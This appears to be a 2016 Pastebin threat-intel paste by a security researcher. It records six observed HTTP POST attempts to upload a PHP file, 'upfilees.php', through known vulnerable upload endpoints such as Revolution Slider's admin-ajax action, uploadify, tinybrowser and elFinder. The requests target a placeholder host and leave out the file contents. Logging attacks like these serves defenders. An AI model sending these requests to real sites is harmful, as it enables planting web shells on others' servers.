Neonprimetime

Malicious File Upload attempts upfilees.php uploadboundary

May 31st, 2016
318
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.21 KB | None | 0 0
  1. Malicious File Upload attempts
  2. *******
  3. *******
  4. *******
  5. POST / HTTP/1.1
  6. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  7. Accept: */*
  8. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  9. Host: www.mysite.com
  10. Content-Length: 340
  11. Connection: Close
  12. yiw_contact[]=upfilees.php
  13. yiw_action=sendemail
  14. id_form=
  15. *******
  16. POST /license.php HTTP/1.1
  17. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  18. Accept: */*
  19. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  20. Host: www.mysite.com
  21. Content-Length: 250
  22. Connection: Close
  23. filename=upfilees.php
  24. 1=
  25. *******
  26. POST /wp-admin/admin-ajax.php HTTP/1.1
  27. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  28. Accept: */*
  29. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  30. Host: www.mysite.com
  31. Content-Length: 360
  32. Connection: Close
  33. update_file=upfilees.php
  34. action=revslider_ajax_action
  35. client_action=
  36. *******
  37. POST/uploadify/uploadify.php?folder=/ HTTP/1.1
  38. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  39. Accept: */*
  40. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  41. Host: www.mysite.com
  42. Content-Length: 241
  43. Connection: Close
  44. Filedata=upfilees.php
  45. 1=
  46. *******
  47. POST/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass= HTTP/1.1
  48. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  49. Accept: */*
  50. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  51. Host: www.mysite.com
  52. Content-Length: 358
  53. Connection: Close
  54. Filedata=upfilees.php.suspected
  55. Filename=send.php.suspected
  56. Upload=
  57. *******
  58. POST /sites/all/libraries/elfinder/php/connector.minimal.php HTTP/1.1
  59. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  60. Accept: */*
  61. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  62. Host: www.mysite.com
  63. Content-Length: 394
  64. Connection: Close
  65. upload[]=upfilees.php
  66. cmd=upload
  67. target=l1_Lw
  68. html=
  69. *******
  70. *******
  71. *******
  72. More FROM @neonprimetime security
  73.  
  74. http://pastebin.com/u/Neonprimetime
  75. https://www.virustotal.com/en/USER/neonprimetime/
  76. https://twitter.com/neonprimetime
  77. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment